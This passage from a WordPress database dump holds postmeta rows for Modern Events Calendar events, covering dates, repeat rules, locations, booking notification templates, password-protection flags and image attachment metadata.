ce','1'),(149600,265900,'mec_ticket_variations','a:0:{}'),(149601,265900,'mec_ticket_variations_global_inheritance','1'),(149602,265900,'mec_fees','a:0:{}'),(149603,265900,'mec_booking','a:0:{}'),(149604,265900,'mec_tickets','a:0:{}'),(149605,265900,'mec_fees_global_inheritance','1'),(149606,265900,'mec_hourly_schedules','a:0:{}'),(149607,265900,'mec_not_in_days',''),(149608,265900,'mec_in_days',''),(149609,265900,'mec_repeat_end_at_date',''),(149610,265900,'mec_advanced_days','a:0:{}'),(149611,265900,'passster_protection_type','password'),(149612,265900,'passster_activate_global_protection',NULL),(149613,265900,'passster_activate_protection',NULL),(149614,265900,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(149615,265900,'mec_repeat_end_at_occurrences',''),(149616,265900,'mec_repeat_end',''),(149617,265900,'mec_repeat_interval','1'),(149618,265900,'mec_allday','0'),(149619,265900,'mec_certain_weekdays','a:0:{}'),(149620,265900,'mec_dont_show_map','0'),(149621,265900,'mec_location_id','118'),(149622,265900,'mec_color',''),(149623,265900,'protect_children',''),(149624,265900,'_edit_lock','1636485809:2'),(149625,265900,'_edit_last','2'),(149629,265902,'_wp_attached_file','2021/11/orange-path-walking-2.jpg'),(149630,265902,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:607;s:6:\"height\";i:317;s:4:\"file\";s:33:\"2021/11/orange-path-walking-2.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"orange-path-walking-2-300x157.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"orange-path-walking-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:33:\"orange-path-walking-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:33:\"orange-path-walking-2-474x317.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:317;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:33:\"orange-path-walking-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:33:\"orange-path-walking-2-300x317.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:317;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"orange-path-walking-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(149631,265900,'_thumbnail_id','265902'),(149632,265904,'protect_children',''),(149633,265904,'_edit_lock','1636499787:2'),(149634,265904,'_edit_last','2'),(149636,265904,'mec_color',''),(149637,265904,'mec_location_id','129'),(149638,265904,'mec_dont_show_map','0'),(149639,265904,'mec_organizer_id','1'),(149640,265904,'mec_read_more',''),(149641,265904,'mec_more_info',''),(149642,265904,'mec_more_info_title',''),(149643,265904,'mec_more_info_target','_self'),(149644,265904,'mec_cost',''),(149645,265904,'mec_currency','a:0:{}'),(149646,265904,'mec_additional_organizer_ids','a:0:{}'),(149647,265904,'mec_additional_location_ids','a:0:{}'),(149648,265904,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-14\";s:4:\"hour\";s:2:\"12\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-14\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:2:\"45\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.2\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(149649,265904,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.2\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(149650,265904,'mec_certain_weekdays','a:0:{}'),(149651,265904,'mec_allday','0'),(149652,265904,'one_occurrence','0'),(149653,265904,'mec_hide_time','0'),(149654,265904,'mec_hide_end_time','0'),(149655,265904,'mec_comment',''),(149656,265904,'mec_timezone','global'),(149657,265904,'mec_countdown_method','global'),(149658,265904,'mec_public','1'),(149659,265904,'mec_start_date','2021-11-14'),(149660,265904,'mec_start_time_hour','12'),(149661,265904,'mec_start_time_minutes','30'),(149662,265904,'mec_start_time_ampm','PM'),(149663,265904,'mec_start_day_seconds','45000'),(149664,265904,'mec_end_date','2021-11-14'),(149665,265904,'mec_end_time_hour','1'),(149666,265904,'mec_end_time_minutes','45'),(149667,265904,'mec_end_time_ampm','PM'),(149668,265904,'mec_end_day_seconds','49500'),(149669,265904,'mec_repeat_status','1'),(149670,265904,'mec_repeat_type','advanced'),(149671,265904,'mec_repeat_interval','1'),(149672,265904,'mec_repeat_end','occurrences'),(149673,265904,'mec_repeat_end_at_occurrences','11'),(149674,265904,'mec_repeat_end_at_date','2021-10-17'),(149675,265904,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.2\";}'),(149676,265904,'mec_in_days',''),(149677,265904,'mec_not_in_days',''),(149678,265904,'mec_hourly_schedules','a:0:{}'),(149679,265904,'mec_booking','a:0:{}'),(149680,265904,'mec_tickets','a:0:{}'),(149681,265904,'mec_fees_global_inheritance','1'),(149682,265904,'mec_fees','a:0:{}'),(149683,265904,'mec_ticket_variations_global_inheritance','1'),(149684,265904,'mec_ticket_variations','a:0:{}'),(149685,265904,'mec_reg_fields_global_inheritance','1'),(149686,265904,'mec_reg_fields','a:0:{}'),(149687,265904,'mec_bfixed_fields','a:0:{}'),(149688,265904,'mec_op','a:0:{}'),(149689,265904,'mec_fields','a:0:{}'),(149690,265904,'mec_event_status','EventScheduled'),(149691,265904,'mec_moved_online_link',''),(149692,265904,'mec_cancelled_reason',''),(149693,265904,'mec_display_cancellation_reason_in_single_page',''),(149694,265904,'boldgrid_hide_page_title','0'),(149695,265904,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(149696,265904,'passster_activate_global_protection',NULL),(149697,265904,'passster_activate_protection',NULL),(149698,265904,'passster_protection_type','password'),(149699,264632,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(149700,264632,'passster_activate_global_protection',NULL),(149701,264632,'passster_activate_protection',NULL),(149702,264632,'passster_protection_type','password'),(149703,265906,'protect_children',''),(149704,265906,'_edit_lock','1636490007:2'),(149705,265906,'_edit_last','2'),(151760,266078,'mec_advanced_days','a:0:{}'),(149707,265906,'mec_color',''),(149708,265906,'mec_location_id','118'),(149709,265906,'mec_dont_show_map','0'),(149710,265906,'mec_organizer_id','1'),(149711,265906,'mec_read_more',''),(149712,265906,'mec_more_info',''),(149713,265906,'mec_more_info_title',''),(149714,265906,'mec_more_info_target','_self'),(149715,265906,'mec_cost',''),(149716,265906,'mec_currency','a:0:{}'),(149717,265906,'mec_additional_organizer_ids','a:0:{}'),(149718,265906,'mec_additional_location_ids','a:0:{}'),(149719,265906,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-15\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-15\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Mon.3\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(149720,265906,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Mon.3\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(149721,265906,'mec_certain_weekdays','a:0:{}'),(149722,265906,'mec_allday','0'),(149723,265906,'one_occurrence','0'),(149724,265906,'mec_hide_time','0'),(149725,265906,'mec_hide_end_time','0'),(149726,265906,'mec_comment',''),(149727,265906,'mec_timezone','global'),(149728,265906,'mec_countdown_method','global'),(149729,265906,'mec_public','1'),(149730,265906,'mec_start_date','2021-11-15'),(149731,265906,'mec_start_time_hour','7'),(149732,265906,'mec_start_time_minutes','0'),(149733,265906,'mec_start_time_ampm','PM'),(149734,265906,'mec_start_day_seconds','68400'),(149735,265906,'mec_end_date','2021-11-15'),(149736,265906,'mec_end_time_hour','8'),(149737,265906,'mec_end_time_minutes','30'),(149738,265906,'mec_end_time_ampm','PM'),(149739,265906,'mec_end_day_seconds','73800'),(149740,265906,'mec_repeat_status','1'),(149741,265906,'mec_repeat_type','advanced'),(149742,265906,'mec_repeat_interval','1'),(149743,265906,'mec_repeat_end','occurrences'),(149744,265906,'mec_repeat_end_at_occurrences','11'),(149745,265906,'mec_repeat_end_at_date','2021-10-17'),(149746,265906,'mec_advanced_days','a:1:{i:0;s:5:\"Mon.3\";}'),(149747,265906,'mec_in_days',''),(149748,265906,'mec_not_in_days',''),(149749,265906,'mec_hourly_schedules','a:0:{}'),(149750,265906,'mec_booking','a:0:{}'),(149751,265906,'mec_tickets','a:0:{}'),(149752,265906,'mec_fees_global_inheritance','1'),(149753,265906,'mec_fees','a:0:{}'),(149754,265906,'mec_ticket_variations_global_inheritance','1'),(149755,265906,'mec_ticket_variations','a:0:{}'),(149756,265906,'mec_reg_fields_global_inheritance','1'),(149757,265906,'mec_reg_fields','a:0:{}'),(149758,265906,'mec_bfixed_fields','a:0:{}'),(149759,265906,'mec_op','a:0:{}'),(149760,265906,'mec_fields','a:0:{}'),(149761,265906,'mec_event_status','EventScheduled'),(149762,265906,'mec_moved_online_link',''),(149763,265906,'mec_cancelled_reason',''),(149764,265906,'mec_display_cancellation_reason_in_single_page',''),(149765,265906,'boldgrid_hide_page_title','0'),(149766,265906,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(149767,265906,'passster_activate_global_protection',NULL),(149768,265906,'passster_activate_protection',NULL),(149769,265906,'passster_protection_type','password'),(149770,265907,'protect_children',''),(149771,265907,'_edit_lock','1636493006:2'),(149772,265907,'_edit_last','2'),(151759,266078,'mec_repeat_end_at_date',''),(149774,265907,'mec_color',''),(149775,265907,'mec_location_id','129'),(149776,265907,'mec_dont_show_map','0'),(149777,265907,'mec_organizer_id','1'),(149778,265907,'mec_read_more',''),(149779,265907,'mec_more_info',''),(149780,265907,'mec_more_info_title',''),(149781,265907,'mec_more_info_target','_self'),(149782,265907,'mec_cost',''),(149783,265907,'mec_currency','a:0:{}'),(149784,265907,'mec_additional_organizer_ids','a:0:{}'),(149785,265907,'mec_additional_location_ids','a:0:{}'),(149786,265907,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-04\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"45\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-04\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:2:\"12\";s:8:\"advanced\";s:5:\"Thu.1\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(149787,265907,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:2:\"12\";s:8:\"advanced\";s:5:\"Thu.1\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(149788,265907,'mec_certain_weekdays','a:0:{}'),(149789,265907,'mec_allday','0'),(149790,265907,'one_occurrence','0'),(149791,265907,'mec_hide_time','0'),(149792,265907,'mec_hide_end_time','0'),(149793,265907,'mec_comment',''),(149794,265907,'mec_timezone','global'),(149795,265907,'mec_countdown_method','global'),(149796,265907,'mec_public','1'),(149797,265907,'mec_start_date','2021-11-04'),(149798,265907,'mec_start_time_hour','6'),(149799,265907,'mec_start_time_minutes','45'),(149800,265907,'mec_start_time_ampm','PM'),(149801,265907,'mec_start_day_seconds','67500'),(149802,265907,'mec_end_date','2021-11-04'),(149803,265907,'mec_end_time_hour','7'),(149804,265907,'mec_end_time_minutes','30'),(149805,265907,'mec_end_time_ampm','PM'),(149806,265907,'mec_end_day_seconds','70200'),(149807,265907,'mec_repeat_status','1'),(149808,265907,'mec_repeat_type','advanced'),(149809,265907,'mec_repeat_interval','12'),(149810,265907,'mec_repeat_end','occurrences'),(149811,265907,'mec_repeat_end_at_occurrences','11'),(149812,265907,'mec_repeat_end_at_date','2021-10-17'),(149813,265907,'mec_advanced_days','a:1:{i:0;s:5:\"Thu.1\";}'),(149814,265907,'mec_in_days',''),(149815,265907,'mec_not_in_days',''),(149816,265907,'mec_hourly_schedules','a:0:{}'),(149817,265907,'mec_booking','a:0:{}'),(149818,265907,'mec_tickets','a:0:{}'),(149819,265907,'mec_fees_global_inheritance','1'),(149820,265907,'mec_fees','a:0:{}'),(149821,265907,'mec_ticket_variations_global_inheritance','1'),(149822,265907,'mec_ticket_variations','a:0:{}'),(149823,265907,'mec_reg_fields_global_inheritance','1'),(149824,265907,'mec_reg_fields','a:0:{}'),(149825,265907,'mec_bfixed_fields','a:0:{}'),(149826,265907,'mec_op','a:0:{}'),(149827,265907,'mec_fields','a:0:{}'),(149828,265907,'mec_event_status','EventScheduled'),(149829,265907,'mec_moved_online_link',''),(149830,265907,'mec_cancelled_reason',''),(149831,265907,'mec_display_cancellation_reason_in_single_page',''),(149832,265907,'boldgrid_hide_page_title','0'),(149833,265907,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(149834,265907,'passster_activate_global_protection',NULL),(149835,265907,'passster_activate_protection',NULL),(149836,265907,'passster_protection_type','password'),(149837,265908,'protect_children',''),(149838,265908,'_edit_lock','1636492909:2'),(149839,265908,'_edit_last','2'),(149841,265908,'mec_color',''),(149842,265908,'mec_location_id','118'),(149843,265908,'mec_dont_show_map','0'),(149844,265908,'mec_organizer_id','1'),(149845,265908,'mec_read_more',''),(149846,265908,'mec_more_info',''),(149847,265908,'mec_more_info_title',''),(149848,265908,'mec_more_info_target','_self'),(149849,265908,'mec_cost',''),(149850,265908,'mec_currency','a:0:{}'),(149851,265908,'mec_additional_organizer_ids','a:0:{}'),(149852,265908,'mec_additional_location_ids','a:0:{}'),(149853,265908,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-02-08\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-02-08\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Tue.2\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(149854,265908,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Tue.2\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(149855,265908,'mec_certain_weekdays','a:0:{}'),(149856,265908,'mec_allday','0'),(149857,265908,'one_occurrence','0'),(149858,265908,'mec_hide_time','0'),(149859,265908,'mec_hide_end_time','0'),(149860,265908,'mec_comment',''),(149861,265908,'mec_timezone','global'),(149862,265908,'mec_countdown_method','global'),(149863,265908,'mec_public','1'),(149864,265908,'mec_start_date','2022-02-08'),(149865,265908,'mec_start_time_hour','7'),(149866,265908,'mec_start_time_minutes','0'),(149867,265908,'mec_start_time_ampm','PM'),(149868,265908,'mec_start_day_seconds','68400'),(149869,265908,'mec_end_date','2022-02-08'),(149870,265908,'mec_end_time_hour','8'),(149871,265908,'mec_end_time_minutes','30'),(149872,265908,'mec_end_time_ampm','PM'),(149873,265908,'mec_end_day_seconds','73800'),(149874,265908,'mec_repeat_status','1'),(149875,265908,'mec_repeat_type','advanced'),(149876,265908,'mec_repeat_interval','1'),(149877,265908,'mec_repeat_end','occurrences'),(149878,265908,'mec_repeat_end_at_occurrences','11'),(149879,265908,'mec_repeat_end_at_date','2021-10-17'),(149880,265908,'mec_advanced_days','a:1:{i:0;s:5:\"Tue.2\";}'),(149881,265908,'mec_in_days',''),(149882,265908,'mec_not_in_days',''),(149883,265908,'mec_hourly_schedules','a:0:{}'),(149884,265908,'mec_booking','a:0:{}'),(149885,265908,'mec_tickets','a:0:{}'),(149886,265908,'mec_fees_global_inheritance','1'),(149887,265908,'mec_fees','a:0:{}'),(149888,265908,'mec_ticket_variations_global_inheritance','1'),(149889,265908,'mec_ticket_variations','a:0:{}'),(149890,265908,'mec_reg_fields_global_inheritance','1'),(149891,265908,'mec_reg_fields','a:0:{}'),(149892,265908,'mec_bfixed_fields','a:0:{}'),(149893,265908,'mec_op','a:0:{}'),(149894,265908,'mec_fields','a:0:{}'),(149895,265908,'mec_event_status','EventScheduled'),(149896,265908,'mec_moved_online_link',''),(149897,265908,'mec_cancelled_reason',''),(149898,265908,'mec_display_cancellation_reason_in_single_page',''),(149899,265908,'boldgrid_hide_page_title','0'),(149900,265908,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(149901,265908,'passster_activate_global_protection',NULL),(149902,265908,'passster_activate_protection',NULL),(149903,265908,'passster_protection_type','password'),(149904,265909,'protect_children',''),(149905,265909,'_edit_lock','1646239778:2'),(149906,265909,'_edit_last','2'),(151758,266078,'mec_repeat_end_at_occurrences',''),(149908,265909,'mec_color',''),(149909,265909,'mec_location_id','141'),(149910,265909,'mec_dont_show_map','1'),(149911,265909,'mec_organizer_id','1'),(149912,265909,'mec_read_more',''),(149913,265909,'mec_more_info',''),(149914,265909,'mec_more_info_title',''),(149915,265909,'mec_more_info_target','_self'),(149916,265909,'mec_cost',''),(149917,265909,'mec_currency','a:0:{}'),(149918,265909,'mec_additional_organizer_ids','a:0:{}'),(149919,265909,'mec_additional_location_ids','a:0:{}'),(149920,265909,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-20\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-20\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sat.3\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(149921,265909,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sat.3\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(149922,265909,'mec_certain_weekdays','a:0:{}